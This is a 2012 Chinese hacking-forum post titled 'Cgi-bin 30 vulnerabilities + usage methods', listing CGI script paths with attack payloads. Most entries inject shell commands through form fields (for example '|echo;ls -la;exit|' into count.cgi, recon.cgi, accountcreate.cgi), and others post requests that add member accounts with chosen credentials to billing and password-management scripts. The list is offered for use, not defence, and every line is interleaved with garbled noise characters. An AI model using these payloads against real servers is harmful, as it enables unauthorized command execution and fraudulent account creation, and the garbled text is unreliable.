找回密码
 立即注册
查看: 3394|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
6 A5 w3 J2 B9 y5 i7 P' j/ F; _4 D+ k+ n/ e; r" d4 y" M
/smspass.pl: m$ o9 o) g+ U/ S. }8 i9 ^
username=username&password=password/ Z; \" z: m, G# h$ c) D
+ D! l; _! n% e  j, R
/index.cgi
$ Z; P1 E' V" y1 X0 W7 f5 _wei=ren&gen=command
. d8 j( u1 v- |/ Z9 b. }* n1 `% A3 b; K: q9 a5 }8 i+ z
/passmaster.cgi. @5 O! c( l( U- R# \
Action=Add&Username=Username&Password=Password6 {9 n) d9 |7 f$ p

) @& z4 `  d7 b' H) j7 D) \/accountcreate.cgi
' s) n4 I2 Z/ D. lusername=username&password=password&ref1=|echo;ls|- O# [' S; m+ Y- S

& F+ @5 E/ q7 |% f/form.cgi
, \2 @. w( V. c/ m2 [! vname=xxxx&email=email&subject=xxxx&response=|echo;ls|3 o$ I* p; `* S! ~$ U5 y

+ v. ^" V. ~/ q/ w2 R4 }/addusr.pl* {. [; F# E: J% B- U
/cgi-bin/EuroDebit/addusr.pl
1 }5 i. V, q3 O: L( ]( \( ]user=username&pass=Password&confirm=Password
! j3 @; }) S; }9 v; }) v6 ]
# {" S( b1 v( `: G6 E5 M* R! u/ccbill-local.asp, N% y" P1 l9 u% I5 B& n
post_values=username:password
# n5 y( O& @# I
9 X; f' ]% E4 q1 W/count.cgi
6 U8 C) j+ o/ i. o8 Z5 @pinfile=|echo;ls -la;exit|9 n& L- f4 f/ l) u2 R# ]0 n7 x# L
( k& ~. _/ j: [0 a
/recon.cgi
3 N: y/ a4 X& h/recon.cgi?search6 L) i( o& ?8 F: J. K: \
searchoption=1&searchfor=|echo;ls -al;exit|! x) p! {; u  x) {: A2 ~

) B$ |7 j" G( t; Q- f" Z, E% v$ T/verotelrum.pl! ~# o6 Q' U  P: y
vercode=username:password:dseegsow:add:amount<&30>! a( _4 `# f6 z

8 j. j; F3 q) q2 Y$ V9 q  D/af.cgi$ F. m/ \( @% X: e4 D
_browser_out=|echo;ls -la;exit;|
  W. Y) @8 ]3 ~( q5 w$ x1 k
/ ?/ f" w& E( D! W3 z" f$ h1 S/modify.cgi  c9 ^* \, x% X, B, y  L1 C+ `
username=username&password=password&expire=30, K, b- x# t. b
4 I$ a- [  K! r  E4 n
/openjournal.cgi
3 O5 b& D' ~9 R" g4 [( gedit=1&ct=2&go=|echo;ls -al;exit|! R% v4 [0 K8 Y% y
' D; y% Q* W% W" z6 h
/gx9passwd.cgi
2 o  ]7 p$ D7 S, {( k; v/ C+ ^, Scmd=ADD&user=username&pass=password( A' W# I6 N' ?) {- |  V; P

' |( L4 B3 a5 B* }( f/probecontrol.cgi
  o- j% G4 d% v) g0 D- Jcommand=enable&username=username&password=password5 l6 P. L, Q/ E! e1 u( f/ e

1 ^; D1 t/ |' p( {/recon.cgi. d- K0 O) {% Q! |- _2 ~7 i6 a
searchoption=3&searchfor=echo;ls -la;exit7 e5 t7 J7 c; ~# A0 u3 A
% _- A0 y! R( \( _
/htadd.pl
* z) q5 |7 U6 @4 ?- @configfile=|echo; ls -alt; exit
% g6 U1 }- ]1 g7 ?+ ?! \: p. I( b: M$ S6 A
/gx9passwd.cgi7 y. E1 e/ c8 N5 M+ U, s! E- q
cmd=ADD&user=username&pass=password- r( x; y4 ^+ I) q7 R- Y
- s  C% g1 C7 {% x
/ibill*.pl
( L# J- a5 |, A; V3 [reqtype=add&authpwd=authpwd&username=username&password=password
) X! o. O7 V( U
9 {3 J3 d- \1 i# ^* T8 h2 B/cpay.cgi# G& s# e; j0 A+ N
command=add_member&username=username(EMAIL)&password=password(DES)- X( t4 r1 v- O5 ?! C, @$ v

5 n& J' k! F  m2 |2 z' {8 d/globill_ut.cgi* o5 G5 D2 J( l6 w: u- F
do=add&username=username&password=password&wpassword=password0 R  I& i. m- x9 ^
1 e9 s0 Q0 u3 g3 [! `6 X
/usercontrol.cgi1 ?# b- c& f+ s7 `# s+ H
command=enable&username=USER&password=PASS$ @: \9 f1 d' \1 e. U
$ `! w3 y+ D, m8 W
/globoSALErum.cgi6 b+ Q- {4 ^) D" i- n0 @
action=ADD&seccode=seccode&login=username&password=password' |1 i) l1 E3 D8 Q, f# m2 @; ^  P3 v
# ^% Y# c- B" w% P
/addusr.pl
& R3 j7 D; v3 r  F0 ]user=USER&pass=PASS&confirm=PASS
! z" j7 |! n: V0 R: q
; c6 X3 k7 F/ P1 }) {, E/pincount.cgi
! ]% v5 L4 d# J' P/cgi-bin/mastergate/pincount.cgi
# @) D4 p% ~9 L7 k4 n( l5 z" spinfile=|echo;pwd;exit|8 k3 E) Q( H4 A4 e4 D% K/ `
" q! K. M4 G' D& c% h0 y: V
/accountcreate.cgi5 d& D8 q& _% D7 j
/cgi-bin/gateway/accountcreate.cgi3 X; i( `: T: J7 G' _+ Z$ e& v
username=username&password=password&password2=password&ref1=|echo;ls -al;exit9 N  e6 p4 f  x5 ^3 C
" O9 N! o5 U6 x! s+ o1 z+ y( [/ y4 m
/af.cgi2 o. J* M! B% ~& `0 {0 n
/env.cgi$ r. M  {3 H9 G  ~! H% R  y
ADD+;echo;pwd;exit
9 z( V7 S  t  h6 n5 \: V8 c7 R
0 |! R/ y3 V# C; k, D9 @/count.cgi
( K$ l- A+ e4 Rpinfile=|echo;pwd;exit|
) x) Q  m% t2 G+ y) J5 ~  g( l% ~
+ ?# ~# M; S$ Y/recon.cgi$ h2 i0 e/ W! P8 L3 m7 h
searchoption=1&searchfor=|echo;ls%20-al;exit|# [" C( ]+ H3 F& _! T! u
! K7 w5 |  N" r! O, h, i
/add.cgi1 {5 P9 _6 K4 Y2 E# |
username=username&password=password&expire=30
2 [4 U3 B  x6 P7 c4 h
5 }# Y8 x/ `. O/ j. d& @+ C==============================
6 _4 K, I& A$ _1 a5 J5 u# k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表